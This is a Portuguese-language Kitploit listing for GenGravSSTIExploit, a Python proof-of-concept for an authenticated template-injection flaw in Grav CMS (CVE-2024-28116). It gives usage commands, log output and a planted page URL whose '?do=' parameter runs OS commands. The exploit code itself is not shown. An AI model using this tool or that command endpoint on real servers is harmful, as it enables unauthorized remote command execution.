Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
GenGravSSTIExploit — é um script Python de PoC que explora uma vulnerabilidade autenticada de Injeção de Template no Lado do Servidor (SSTI) no Grav CMS versões <= 1.7.44 (CVE-2024-28116) | Kitploit
Ferramentas/GitHubGitHub/geniuszly/gengravsstiexploit
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHubgeniuszly/gengravsstiexploit

GenGravSSTIExploit

é um script Python de PoC que explora uma vulnerabilidade autenticada de Injeção de Template no Lado do Servidor (SSTI) no Grav CMS versões <= 1.7.44 (CVE-2024-28116)

Ver Repositório
72há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PT

GenGravSSTIExploit é um script Python PoC que explora uma vulnerabilidade autenticada de Injeção de Template no Lado do Servidor (SSTI) no Grav CMS versões <= 1.7.44 (CVE-2024-28116). Essa vulnerabilidade permite que um usuário com permissões de editor execute comandos do sistema operacional em um servidor remoto.

Nota: Este script requer credenciais válidas para autenticar no console do Grav CMS.

Funcionalidades

  • Autentica-se no painel de administração do Grav CMS usando credenciais de editor.
  • Cria uma nova página no CMS para injetar um payload.
  • Executa comandos do sistema operacional remotamente, aproveitando a vulnerabilidade SSTI.

Requisitos

  • Python 3.x
  • Biblioteca requests (instalar com pip install requests)

Uso

  1. Clone o Repositório

    root@kitploit:~
    git clone https://github.com/geniuszly/GenGravSSTIExploit
    cd GenGravSSTIExploit
    
  2. Configure as Credenciais

    Edite o script para fornecer suas credenciais de editor do Grav CMS:

    root@kitploit:~
    GRAV_USER = "youruser"
    GRAV_PASSWORD = "yourpassword"
    
  3. Execute o Script

    Use o seguinte comando para executar o script:

    root@kitploit:~
    python GenGravSSTIExploit.py -t <TARGET_URL> -p <PORT>
    
    • <TARGET_URL>: URL alvo no formato http[s]://hostname.
    • <PORT>: Número da porta (padrão é 80).

    Exemplo:

    root@kitploit:~
    python GenGravSSTIExploit.py -t http://example.com -p 8080
    
  4. Interaja com o Exploit

    Se o exploit for bem-sucedido, você receberá uma URL onde poderá executar comandos do SO:

    root@kitploit:~
    [+] Payload RCE injetado. Visite a página maliciosa: http://example.com:8080/poc_<ID>?do=<command>
    

Exemplo de saída

root@kitploit:~
  python GenGravSSTIExploit.py -t http://example.com -p 8080

O script executará cada etapa, fornecendo atualizações pelo terminal. Aqui está o que você pode ver:

root@kitploit:~
2024-10-02 12:00:01 - INFO - Verificando URL alvo...
2024-10-02 12:00:02 - INFO - Obtendo session cookie e login-nonce...
2024-10-02 12:00:03 - INFO - Tentando autenticação no Grav CMS...
2024-10-02 12:00:04 - INFO - Acessando o painel administrativo após autenticação...
2024-10-02 12:00:05 - INFO - Criando nova página...
2024-10-02 12:00:06 - INFO - Obtendo form-nonce e unique_form_id...
2024-10-02 12:00:07 - INFO - Injetando payload RCE...
2024-10-02 12:00:08 - INFO - [+] Injeção RCE bem-sucedida. Visite o link: http://example.com:8080/poc_4T7B?do=<command>

Após a conclusão do script, você verá uma mensagem com o link para a página injetada. Você pode visitar este link para executar comandos do sistema operacional:

root@kitploit:~
http://example.com:8080/poc_4T7B?do=whoami

Visitar a URL com o comando especificado exibirá a saída diretamente na página:

root@kitploit:~
Saída do comando:
root

Aviso de isenção de responsabilidade

Esta ferramenta destina-se apenas a fins educacionais. Use-a com responsabilidade e apenas em sistemas onde você tenha permissão explícita. O autor não se responsabiliza por qualquer uso indevido ou dano causado por este script.

Baixar ferramenta